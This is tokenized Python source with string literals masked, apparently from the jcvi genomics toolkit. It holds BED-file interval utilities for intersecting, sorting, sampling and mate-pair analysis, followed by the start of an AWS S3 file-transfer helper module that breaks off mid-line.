<EOL> sh ( cmd , outfile = complementbedfile ) <EOL> return complementbedfile <EOL> def intersectBed ( bedfile1 , bedfile2 ) : <EOL> cmd = "<STR_LIT>" <EOL> cmd += "<STR_LIT>" . format ( bedfile1 , bedfile2 ) <EOL> suffix = "<STR_LIT>" <EOL> intersectbedfile = "<STR_LIT:.>" . join ( ( op . basename ( bedfile1 ) . split ( "<STR_LIT:.>" ) [ <NUM_LIT:0> ] , <EOL> op . basename ( bedfile2 ) . split ( "<STR_LIT:.>" ) [ <NUM_LIT:0> ] ) ) + suffix <EOL> if need_update ( [ bedfile1 , bedfile2 ] , intersectbedfile ) : <EOL> sh ( cmd , outfile = intersectbedfile ) <EOL> return intersectbedfile <EOL> def query_to_range ( query , sizes ) : <EOL> if "<STR_LIT::>" in query : <EOL> a , bc = query . split ( "<STR_LIT::>" , <NUM_LIT:1> ) <EOL> b , c = [ int ( x ) for x in bc . split ( "<STR_LIT:->" , <NUM_LIT:1> ) ] <EOL> b -= <NUM_LIT:1> <EOL> else : <EOL> a = query <EOL> b , c = <NUM_LIT:0> , sizes . mapping [ a ] <EOL> return a , b , c <EOL> def evaluate ( args ) : <EOL> """<STR_LIT>""" <EOL> from jcvi . formats . sizes import Sizes <EOL> p = OptionParser ( evaluate . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:3> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> prediction , reality , fastafile = args <EOL> query = opts . query <EOL> prediction = mergeBed ( prediction ) <EOL> reality = mergeBed ( reality ) <EOL> sizes = Sizes ( fastafile ) <EOL> sizesfile = sizes . filename <EOL> prediction_complement = complementBed ( prediction , sizesfile ) <EOL> reality_complement = complementBed ( reality , sizesfile ) <EOL> TPbed = intersectBed ( prediction , reality ) <EOL> FPbed = intersectBed ( prediction , reality_complement ) <EOL> FNbed = intersectBed ( prediction_complement , reality ) <EOL> TNbed = intersectBed ( prediction_complement , reality_complement ) <EOL> beds = ( TPbed , FPbed , FNbed , TNbed ) <EOL> if query : <EOL> subbeds = [ ] <EOL> rr = query_to_range ( query , sizes ) <EOL> ce = '<STR_LIT>' . format ( "<STR_LIT:\t>" . join ( str ( x ) for x in rr ) ) <EOL> for b in beds : <EOL> subbed = "<STR_LIT:.>" . join ( ( b , query ) ) <EOL> cmd = ce + "<STR_LIT>" . format ( b ) <EOL> sh ( cmd , outfile = subbed ) <EOL> subbeds . append ( subbed ) <EOL> beds = subbeds <EOL> be = BedEvaluate ( * beds ) <EOL> print >> sys . stderr , be <EOL> if query : <EOL> for b in subbeds : <EOL> os . remove ( b ) <EOL> return be <EOL> def intersectBed_wao ( abedfile , bbedfile , minOverlap = <NUM_LIT:0> ) : <EOL> abed = Bed ( abedfile ) <EOL> bbed = Bed ( bbedfile ) <EOL> print >> sys . stderr , "<STR_LIT>" . format ( abedfile , len ( abed ) ) <EOL> print >> sys . stderr , "<STR_LIT>" . format ( bbedfile , len ( bbed ) ) <EOL> cmd = "<STR_LIT>" . format ( abedfile , bbedfile ) <EOL> acols = abed [ <NUM_LIT:0> ] . nargs <EOL> bcols = bbed [ <NUM_LIT:0> ] . nargs <EOL> fp = popen ( cmd ) <EOL> for row in fp : <EOL> atoms = row . split ( ) <EOL> aline = "<STR_LIT:\t>" . join ( atoms [ : acols ] ) <EOL> bline = "<STR_LIT:\t>" . join ( atoms [ acols : acols + bcols ] ) <EOL> c = int ( atoms [ - <NUM_LIT:1> ] ) <EOL> if c < minOverlap : <EOL> continue <EOL> a = BedLine ( aline ) <EOL> try : <EOL> b = BedLine ( bline ) <EOL> except AssertionError : <EOL> b = None <EOL> yield a , b <EOL> def refine ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( refine . __doc__ ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:3> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> abedfile , bbedfile , refinedbed = args <EOL> fw = open ( refinedbed , "<STR_LIT:w>" ) <EOL> intersected = refined = <NUM_LIT:0> <EOL> for a , b in intersectBed_wao ( abedfile , bbedfile ) : <EOL> if b is None : <EOL> print >> fw , a <EOL> continue <EOL> intersected += <NUM_LIT:1> <EOL> aspan_before = a . span <EOL> arange = ( a . start , a . end ) <EOL> brange = ( b . start , b . end ) <EOL> irange = range_intersect ( arange , brange ) <EOL> a . start , a . end = irange <EOL> aspan_after = a . span <EOL> if aspan_before > aspan_after : <EOL> refined += <NUM_LIT:1> <EOL> print >> fw , a <EOL> fw . close ( ) <EOL> print >> sys . stderr , "<STR_LIT>" . format ( intersected ) <EOL> print >> sys . stderr , "<STR_LIT>" . format ( refined ) <EOL> summary ( [ abedfile ] ) <EOL> summary ( [ refinedbed ] ) <EOL> def distance ( args ) : <EOL> """<STR_LIT>""" <EOL> from jcvi . utils . iter import pairwise <EOL> p = OptionParser ( distance . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = "<STR_LIT>" , choices = ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> help = "<STR_LIT>" "<STR_LIT>" ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , = args <EOL> sortedbedfile = sort ( [ bedfile ] ) <EOL> valid = total = <NUM_LIT:0> <EOL> fp = open ( sortedbedfile ) <EOL> for a , b in pairwise ( fp ) : <EOL> a = BedLine ( a ) <EOL> b = BedLine ( b ) <EOL> ar = ( a . seqid , a . start , a . end , "<STR_LIT:+>" ) <EOL> br = ( b . seqid , b . start , b . end , "<STR_LIT:+>" ) <EOL> dist , oo = range_distance ( ar , br , distmode = opts . distmode ) <EOL> total += <NUM_LIT:1> <EOL> if dist > <NUM_LIT:0> : <EOL> print dist <EOL> valid += <NUM_LIT:1> <EOL> logging . debug ( "<STR_LIT>" . format ( percentage ( valid , total ) ) ) <EOL> def sample ( args ) : <EOL> """<STR_LIT>""" <EOL> import random <EOL> from jcvi . assembly . coverage import Coverage <EOL> p = OptionParser ( sample . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT:0> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT:10> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . set_outfile ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , sizesfile = args <EOL> pf = bedfile . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> raindrop = opts . raindrop <EOL> if raindrop : <EOL> bed = Bed ( bedfile ) <EOL> forward = [ ] <EOL> for b in bed : <EOL> if not forward or abs ( b . start - forward [ - <NUM_LIT:1> ] . start ) >= raindrop : <EOL> forward . append ( b ) <EOL> reverse = [ ] <EOL> bed . sort ( key = lambda x : - x . end ) <EOL> for b in bed : <EOL> if not reverse or abs ( b . end - reverse [ - <NUM_LIT:1> ] . end ) >= raindrop : <EOL> reverse . append ( b ) <EOL> for tag , L in zip ( ( "<STR_LIT>" , "<STR_LIT>" ) , ( forward , reverse ) ) : <EOL> logging . debug ( "<STR_LIT>" . format ( len ( L ) , tag , sum ( x . span for x in L ) ) ) <EOL> selected = Bed ( ) <EOL> selected . extend ( set ( forward + reverse ) ) <EOL> selected . print_to_file ( opts . outfile , sorted = True ) <EOL> return <EOL> targetsize = opts . targetsize <EOL> if targetsize : <EOL> bed = Bed ( bedfile ) <EOL> samplebed = pf + "<STR_LIT>" <EOL> fw = open ( samplebed , "<STR_LIT:w>" ) <EOL> nfeats = len ( bed ) <EOL> nbases = bed . sum ( unique = False ) <EOL> targetfeats = int ( round ( nfeats * targetsize / nbases ) ) <EOL> sub_bed = random . sample ( bed , targetfeats ) <EOL> for b in sub_bed : <EOL> print >> fw , b <EOL> logging . debug ( "<STR_LIT>" . format ( samplebed ) ) <EOL> return <EOL> c = Coverage ( bedfile , sizesfile ) <EOL> coveragefile = c . filename <EOL> samplecoveragefile = pf + "<STR_LIT>" <EOL> fw = open ( samplecoveragefile , "<STR_LIT:w>" ) <EOL> fp = open ( coveragefile ) <EOL> for row in fp : <EOL> seqid , start , end , cov = row . split ( ) <EOL> cov = int ( cov ) <EOL> if cov <= opts . max : <EOL> fw . write ( row ) <EOL> fw . close ( ) <EOL> samplebedfile = pf + "<STR_LIT>" <EOL> cmd = "<STR_LIT>" . format ( bedfile , samplecoveragefile ) <EOL> sh ( cmd , outfile = samplebedfile ) <EOL> logging . debug ( "<STR_LIT>" . format ( samplebedfile ) ) <EOL> def bedpe ( args ) : <EOL> """<STR_LIT>""" <EOL> from jcvi . assembly . coverage import bed_to_bedpe <EOL> p = OptionParser ( bedpe . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = False , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , = args <EOL> pf = bedfile . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> bedpefile = pf + "<STR_LIT>" <EOL> bedspanfile = pf + "<STR_LIT>" if opts . span else None <EOL> bed_to_bedpe ( bedfile , bedpefile , pairsbedfile = bedspanfile , matesfile = opts . mates ) <EOL> return bedpefile , bedspanfile <EOL> def sizes ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( sizes . __doc__ ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , = args <EOL> assert op . exists ( bedfile ) <EOL> sizesfile = bedfile . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] + "<STR_LIT>" <EOL> fw = must_open ( sizesfile , "<STR_LIT:w>" , checkexists = True , skipcheck = True ) <EOL> if fw : <EOL> b = Bed ( bedfile ) <EOL> for s , sbeds in b . sub_beds ( ) : <EOL> print >> fw , "<STR_LIT>" . format ( s , max ( x . end for x in sbeds ) ) <EOL> logging . debug ( "<STR_LIT>" . format ( sizesfile ) ) <EOL> return sizesfile <EOL> def analyze_dists ( dists , cutoff = <NUM_LIT:1000> , alpha = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> peak0 = [ d for d in dists if d < cutoff ] <EOL> peak1 = [ d for d in dists if d >= cutoff ] <EOL> c0 , c1 = len ( peak0 ) , len ( peak1 ) <EOL> logging . debug ( "<STR_LIT>" . format ( c0 , c1 ) ) <EOL> if c0 == <NUM_LIT:0> or c1 == <NUM_LIT:0> or float ( c1 ) / len ( dists ) < alpha : <EOL> logging . debug ( "<STR_LIT>" . format ( c1 , len ( dists ) , alpha ) ) <EOL> return np . median ( dists ) <EOL> peak0_median = np . median ( peak0 ) <EOL> peak1_median = np . median ( peak1 ) <EOL> logging . debug ( "<STR_LIT>" . format ( int ( peak0_median ) , c0 , int ( peak1_median ) , c1 ) ) <EOL> return peak1_median <EOL> def report_pairs ( data , cutoff = <NUM_LIT:0> , mateorientation = None , <EOL> pairsfile = None , insertsfile = None , rclip = <NUM_LIT:1> , ascii = False , bins = <NUM_LIT:20> , <EOL> distmode = "<STR_LIT>" , mpcutoff = <NUM_LIT:1000> ) : <EOL> """<STR_LIT>""" <EOL> allowed_mateorientations = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> if mateorientation : <EOL> assert mateorientation in allowed_mateorientations <EOL> num_fragments , num_pairs = <NUM_LIT:0> , <NUM_LIT:0> <EOL> all_dist = [ ] <EOL> linked_dist = [ ] <EOL> orientations = defaultdict ( int ) <EOL> key = ( lambda x : x . accn [ : - rclip ] ) if rclip else ( lambda x : x . accn ) <EOL> data . sort ( key = key ) <EOL> if pairsfile : <EOL> pairsfw = open ( pairsfile , "<STR_LIT:w>" ) <EOL> if insertsfile : <EOL> insertsfw = open ( insertsfile , "<STR_LIT:w>" ) <EOL> for pe , lines in groupby ( data , key = key ) : <EOL> lines = list ( lines ) <EOL> if len ( lines ) != <NUM_LIT:2> : <EOL> num_fragments += len ( lines ) <EOL> continue <EOL> num_pairs += <NUM_LIT:1> <EOL> a , b = lines <EOL> asubject , astart , astop = a . seqid , a . start , a . end <EOL> bsubject , bstart , bstop = b . seqid , b . start , b . end <EOL> aquery , bquery = a . accn , b . accn <EOL> astrand , bstrand = a . strand , b . strand <EOL> dist , orientation = range_distance ( ( asubject , astart , astop , astrand ) , <EOL> ( bsubject , bstart , bstop , bstrand ) , <EOL> distmode = distmode ) <EOL> if dist >= <NUM_LIT:0> : <EOL> all_dist . append ( ( dist , orientation , aquery , bquery ) ) <EOL> if mateorientation : <EOL> all_dist = [ x for x in all_dist if x [ <NUM_LIT:1> ] == mateorientation ] <EOL> if cutoff <= <NUM_LIT:0> : <EOL> dists = np . array ( [ x [ <NUM_LIT:0> ] for x in all_dist ] , dtype = "<STR_LIT:int>" ) <EOL> p0 = analyze_dists ( dists , cutoff = mpcutoff ) <EOL> cutoff = int ( <NUM_LIT:2> * p0 ) <EOL> cutoff = int ( math . ceil ( cutoff / bins ) ) * bins <EOL> logging . debug ( "<STR_LIT>" . format ( cutoff ) + <EOL> "<STR_LIT>" ) <EOL> for dist , orientation , aquery , bquery in all_dist : <EOL> if dist > cutoff : <EOL> continue <EOL> if cutoff > <NUM_LIT:2> * mpcutoff and dist < mpcutoff : <EOL> continue <EOL> linked_dist . append ( dist ) <EOL> if pairsfile : <EOL> print >> pairsfw , "<STR_LIT>" . format ( aquery , bquery , dist ) <EOL> orientations [ orientation ] += <NUM_LIT:1> <EOL> print >> sys . stderr , "<STR_LIT>" . format ( num_fragments , num_pairs , num_fragments + num_pairs * <NUM_LIT:2> ) <EOL> s = SummaryStats ( linked_dist , dtype = "<STR_LIT:int>" ) <EOL> num_links = s . size <EOL> meandist , stdev = s . mean , s . sd <EOL> p0 , p1 , p2 = s . median , s . p1 , s . p2 <EOL> print >> sys . stderr , "<STR_LIT>" % ( num_links , num_links * <NUM_LIT> / num_pairs , cutoff ) <EOL> print >> sys . stderr , "<STR_LIT>" . format ( meandist , stdev ) <EOL> print >> sys . stderr , "<STR_LIT>" . format ( p0 ) <EOL> print >> sys . stderr , "<STR_LIT>" . format ( p1 , p2 ) <EOL> print >> sys . stderr , "<STR_LIT>" <EOL> orientation_summary = [ ] <EOL> for orientation , count in sorted ( orientations . items ( ) ) : <EOL> o = "<STR_LIT>" . format ( orientation , percentage ( count , num_links , mode = <NUM_LIT:1> ) ) <EOL> orientation_summary . append ( o . split ( ) [ <NUM_LIT:0> ] ) <EOL> print >> sys . stderr , o <EOL> if insertsfile : <EOL> from jcvi . graphics . histogram import histogram <EOL> print >> insertsfw , "<STR_LIT:\n>" . join ( str ( x ) for x in linked_dist ) <EOL> insertsfw . close ( ) <EOL> prefix = insertsfile . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> if prefix > <NUM_LIT:10> : <EOL> prefix = prefix . split ( "<STR_LIT:->" ) [ <NUM_LIT:0> ] <EOL> osummary = "<STR_LIT:U+0020>" . join ( orientation_summary ) <EOL> title = "<STR_LIT>" . format ( prefix , osummary , p0 ) <EOL> histogram ( insertsfile , vmin = <NUM_LIT:0> , vmax = cutoff , bins = bins , <EOL> xlabel = "<STR_LIT>" , title = title , ascii = ascii ) <EOL> if op . exists ( insertsfile ) : <EOL> os . remove ( insertsfile ) <EOL> return s <EOL> def pairs ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( pairs . __doc__ ) <EOL> p . set_pairs ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , = args <EOL> basename = bedfile . split ( "<STR_LIT:.>" ) [ <NUM_LIT:0> ] <EOL> insertsfile = "<STR_LIT:.>" . join ( ( basename , "<STR_LIT>" ) ) <EOL> bedfile = sort ( [ bedfile , "<STR_LIT>" ] ) <EOL> fp = open ( bedfile ) <EOL> data = [ BedLine ( row ) for i , row in enumerate ( fp ) if i < opts . nrows ] <EOL> ascii = not opts . pdf <EOL> return bedfile , report_pairs ( data , opts . cutoff , opts . mateorientation , <EOL> pairsfile = opts . pairsfile , insertsfile = insertsfile , <EOL> rclip = opts . rclip , ascii = ascii , bins = opts . bins , <EOL> distmode = opts . distmode ) <EOL> def summary ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( summary . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = False , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = False , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , = args <EOL> bed = Bed ( bedfile ) <EOL> bs = BedSummary ( bed ) <EOL> if opts . sizes : <EOL> sizesfile = bedfile + "<STR_LIT>" <EOL> fw = open ( sizesfile , "<STR_LIT:w>" ) <EOL> for span , accn in bs . mspans : <EOL> print >> fw , span <EOL> fw . close ( ) <EOL> logging . debug ( "<STR_LIT>" . format ( sizesfile ) ) <EOL> return bs <EOL> if not opts . all : <EOL> bs . report ( ) <EOL> return bs <EOL> for seqid , subbeds in bed . sub_beds ( ) : <EOL> bs = BedSummary ( subbeds ) <EOL> print "<STR_LIT:\t>" . join ( ( seqid , str ( bs ) ) ) <EOL> def sort ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( sort . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> default = False , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> default = False , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = False , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> p . set_outfile ( outfile = None ) <EOL> p . set_tmpdir ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , = args <EOL> inplace = opts . inplace <EOL> if not inplace and "<STR_LIT>" in bedfile : <EOL> return bedfile <EOL> sortedbed = opts . outfile <EOL> if inplace : <EOL> sortedbed = bedfile <EOL> elif opts . outfile is None : <EOL> pf , sf = op . basename ( bedfile ) . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) <EOL> sortedbed = pf + "<STR_LIT>" + sf <EOL> sortopt = "<STR_LIT>" if not opts . accn else "<STR_LIT>" <EOL> cmd = "<STR_LIT>" <EOL> if opts . tmpdir : <EOL> cmd += "<STR_LIT>" . format ( opts . tmpdir ) <EOL> if opts . unique : <EOL> cmd += "<STR_LIT>" <EOL> cmd += "<STR_LIT>" . format ( sortopt , bedfile , sortedbed ) <EOL> if inplace or need_update ( bedfile , sortedbed ) : <EOL> sh ( cmd ) <EOL> return sortedbed <EOL> def mates ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( mates . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = False , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = False , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = False , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> p . set_mates ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , = args <EOL> rclip = opts . rclip <EOL> key = ( lambda x : x . accn [ : - rclip ] ) if rclip else ( lambda x : x . accn ) <EOL> bed = Bed ( bedfile , key = key ) <EOL> pf = bedfile . rsplit ( "<STR_LIT:.>" , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> matesfile = pf + "<STR_LIT>" <EOL> lib = pf if opts . lib else None <EOL> fw = open ( matesfile , "<STR_LIT:w>" ) <EOL> if lib : <EOL> bedfile , stats = pairs ( [ bedfile , "<STR_LIT>" . format ( rclip ) , <EOL> "<STR_LIT>" . format ( opts . cutoff ) ] ) <EOL> sv = int ( <NUM_LIT:2> * stats . sd ) <EOL> mindist = max ( stats . mean - sv , <NUM_LIT:1> ) <EOL> maxdist = stats . mean + sv <EOL> print >> fw , "<STR_LIT:\t>" . join ( str ( x ) for x in ( "<STR_LIT>" , pf , mindist , maxdist ) ) <EOL> num_fragments = num_pairs = <NUM_LIT:0> <EOL> matesbedfile = matesfile + "<STR_LIT>" <EOL> fwm = open ( matesbedfile , "<STR_LIT:w>" ) <EOL> for pe , lines in groupby ( bed , key = key ) : <EOL> lines = list ( lines ) <EOL> if len ( lines ) != <NUM_LIT:2> : <EOL> num_fragments += len ( lines ) <EOL> continue <EOL> a , b = lines <EOL> if opts . nointra and a . seqid == b . seqid : <EOL> continue <EOL> if opts . prefix : <EOL> aprefix = a . seqid . split ( "<STR_LIT:_>" ) [ <NUM_LIT:0> ] <EOL> bprefix = b . seqid . split ( "<STR_LIT:_>" ) [ <NUM_LIT:0> ] <EOL> if aprefix != bprefix : <EOL> continue <EOL> num_pairs += <NUM_LIT:1> <EOL> pair = [ a . accn , b . accn ] <EOL> if lib : <EOL> pair . append ( lib ) <EOL> print >> fw , "<STR_LIT:\t>" . join ( pair ) <EOL> print >> fwm , a <EOL> print >> fwm , b <EOL> logging . debug ( "<STR_LIT>" . format ( num_fragments , num_pairs , matesfile , matesbedfile ) ) <EOL> fw . close ( ) <EOL> fwm . close ( ) <EOL> return matesfile , matesbedfile <EOL> def flanking ( args ) : <EOL> """<STR_LIT>""" <EOL> from numpy import array , argsort <EOL> p = OptionParser ( flanking . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = None , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = None , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = <NUM_LIT:10> , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = "<STR_LIT>" , choices = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> help = "<STR_LIT>" ) <EOL> p . add_option ( "<STR_LIT>" , default = None , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" ) <EOL> p . set_outfile ( ) <EOL> opts , args = p . parse_args ( args ) <EOL> if any ( [ len ( args ) != <NUM_LIT:1> , opts . chrom is None , opts . coord is None ] ) : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> bedfile , = args <EOL> position = ( opts . chrom , opts . coord ) <EOL> n , side , maxd = opts . n , opts . side , opts . max_d <EOL> chrombed = Bed ( bedfile ) . sub_bed ( position [ <NUM_LIT:0> ] ) <EOL> if side == "<STR_LIT>" : <EOL> data = [ ( abs ( f . start - position [ <NUM_LIT:1> ] ) , f ) for f in chrombed if f . start <= position [ <NUM_LIT:1> ] ] <EOL> elif side == "<STR_LIT>" : <EOL> data = [ ( abs ( f . start - position [ <NUM_LIT:1> ] ) , f ) for f in chrombed if f . start >= position [ <NUM_LIT:1> ] ] <EOL> else : <EOL> data = [ ( abs ( f . start - position [ <NUM_LIT:1> ] ) , f ) for f in chrombed ] <EOL> if maxd : <EOL> data = [ f for f in data if f [ <NUM_LIT:0> ] <= maxd ] <EOL> n += <NUM_LIT:1> <EOL> n = min ( n , len ( data ) ) <EOL> distances , subbed = zip ( * data ) <EOL> distances = array ( distances ) <EOL> idx = argsort ( distances ) [ : n ] <EOL> flankingbed = [ f for ( i , f ) in enumerate ( subbed ) if i in idx ] <EOL> fw = must_open ( opts . outfile , "<STR_LIT:w>" ) <EOL> for atom in flankingbed : <EOL> print >> fw , str ( atom ) <EOL> return ( position , flankingbed ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> import os . path as op <EOL> import sys <EOL> import fnmatch <EOL> import boto3 <EOL> from jcvi . formats . base import SetFile <EOL> from jcvi . apps . base import OptionParser , ActionDispatcher , popen , sh <EOL> def main ( ) : <EOL> actions = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> p = ActionDispatcher ( actions ) <EOL> p . dispatch ( globals ( ) ) <EOL> def glob_s3 ( store , keys = None ) : <EOL> store , cards = store . rsplit ( "<STR_LIT:/>" , <NUM_LIT:1> ) <EOL> contents = ls_s3 ( store ) <EOL> if keys : <EOL> filtered = [ x for x in contents if op . basename ( x ) . split ( "<STR_LIT:.>" ) [ <NUM_LIT:0> ] in keys ] <EOL> else : <EOL> filtered = fnmatch . filter ( contents , cards ) <EOL> filtered = [ "<STR_LIT:/>" . join ( ( store , x ) ) for x in filtered ] <EOL> return filtered <EOL> def rm_s3 ( store ) : <EOL> cmd = "<STR_LIT>" . format ( store ) <EOL> sh ( cmd ) <EOL> def rm ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( rm . __doc__ ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> store , = args <EOL> contents = glob_s3 ( store ) <EOL> for c in contents : <EOL> rm_s3 ( c ) <EOL> def cp ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( cp . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , default = False , <EOL> action = "<STR_LIT:store_true>" , help = "<STR_LIT>" ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:2> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> store , folder = args <EOL> contents = glob_s3 ( store ) <EOL> for c in contents : <EOL> oc = op . basename ( c ) <EOL> tc = op . join ( folder , oc ) <EOL> if opts . force or not op . exists ( tc ) : <EOL> pull_from_s3 ( c ) <EOL> def ls ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( ls . __doc__ ) <EOL> p . add_option ( "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) != <NUM_LIT:1> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> store , = args <EOL> keys = opts . keys <EOL> if keys : <EOL> keys = SetFile ( keys ) <EOL> print "<STR_LIT:\n>" . join ( glob_s3 ( store , keys = keys ) ) <EOL> def s3ify ( address ) : <EOL> if not address . startswith ( "<STR_LIT>" ) : <EOL> address = "<STR_LIT>" + address . lstrip ( "<STR_LIT:/>" ) <EOL> return address <EOL> def push_to_s3 ( s3_store , obj_name ) : <EOL> cmd = "<STR_LIT>" if op . isdir ( obj_name ) else "<STR_LIT>" <EOL> s3address = "<STR_LIT>" . format ( s3_store , obj_name ) <EOL> s3address = s3ify ( s3address ) <EOL> cmd = "<STR_LIT>" . format ( cmd , obj_name , s3address ) <EOL> sh ( cmd ) <EOL> return s3address <EOL> def pull_from_s3 ( s3_store , file_name = None , overwrite = True ) : <EOL> is_dir = s3_store . endswith ( "<STR_LIT:/>" ) <EOL> if is_dir : <EOL> s3_store = s3_store . rstrip ( "<STR_LIT:/>" ) <EOL> file_name = file_name or s3_store . split ( "<STR_LIT:/>" ) [ - <NUM_LIT:1> ] <EOL> if not op . exists ( file_name ) : <EOL> s3_store = s3ify ( s3_store ) <EOL> if overwrite or ( not op . exists ( file_name ) ) : <EOL> cmd = "<STR_LIT>" . format ( s3_store , file_name ) <EOL> if is_dir : <EOL> cmd += "<STR_LIT>" <EOL> sh ( cmd ) <EOL> return op . abspath ( file_name ) <EOL> def ls_s3 ( s3_store_obj_name ) : <EOL> s3_store_obj_name = s3ify ( s3_store_obj_name ) <EOL> cmd = "<STR_LIT>" . format ( s3_store_obj_name ) <EOL> contents = [ ] <EOL> for row in popen ( cmd ) : <EOL> contents . append ( row . split ( ) [ - <NUM_LIT:1> ] ) <EOL> return contents <EOL> def check_exists_s3 ( s3_store_obj_name ) : <EOL> s3_store_obj_name = s3ify ( s3_store_obj_name ) <EOL> cmd = "<STR_LIT>" . format ( s3_store_obj_name ) <EOL> counts = int ( popen ( cmd ) . read ( ) ) <EOL> return counts != <NUM_LIT:0> <EOL> def aws_configure ( profile , key , value ) : <EOL> sh ( '<STR_LIT>' . format ( profile , key , value ) ) <EOL> def role ( args ) : <EOL> """<STR_LIT>""" <EOL> p = OptionParser ( role . __doc__ ) <EOL> opts , args = p . parse_args ( args ) <EOL> if len ( args ) == <NUM_LIT:1> and args [ <NUM_LIT:0> ] == "<STR_LIT>" : <EOL> args = "<STR_LIT>" . split ( ) <EOL> if len ( args ) 